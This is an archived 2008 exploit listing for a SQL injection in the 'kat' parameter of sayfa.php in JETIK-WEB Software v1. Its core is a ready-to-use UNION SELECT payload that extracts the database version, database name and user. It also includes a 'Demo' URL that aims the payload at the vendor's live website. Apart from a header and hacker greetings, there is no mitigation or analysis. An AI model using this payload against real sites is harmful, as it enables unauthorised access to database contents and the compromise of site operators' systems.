JETIK-WEB Software (sayfa.php kat) SQL Injection Vulnerability

2008-09-23T00:00:00
ID 1337DAY-ID-3734
Type zdt
Reporter DevilZ TM
Modified 2008-09-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
JETIK-WEB Software (sayfa.php kat) SQL Injection Vulnerability
==============================================================



[~]-----------------------------------------------------------
[~] JETIK-WEB Software v1 - SQL Injection Vulnerability
[~]
[~] http://www.jetik.net
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 22.09.2008
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Pentest| Gibon| Pig       
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/sayfa.php?kat=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3/*
[~]
[~] Demo :-
[~]
[~] http://www.jetik.net/sayfa.php?kat=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/*
[~]
[~]--------------------------------------------------------------------------------------------------------------



#  0day.today [2018-01-04]  #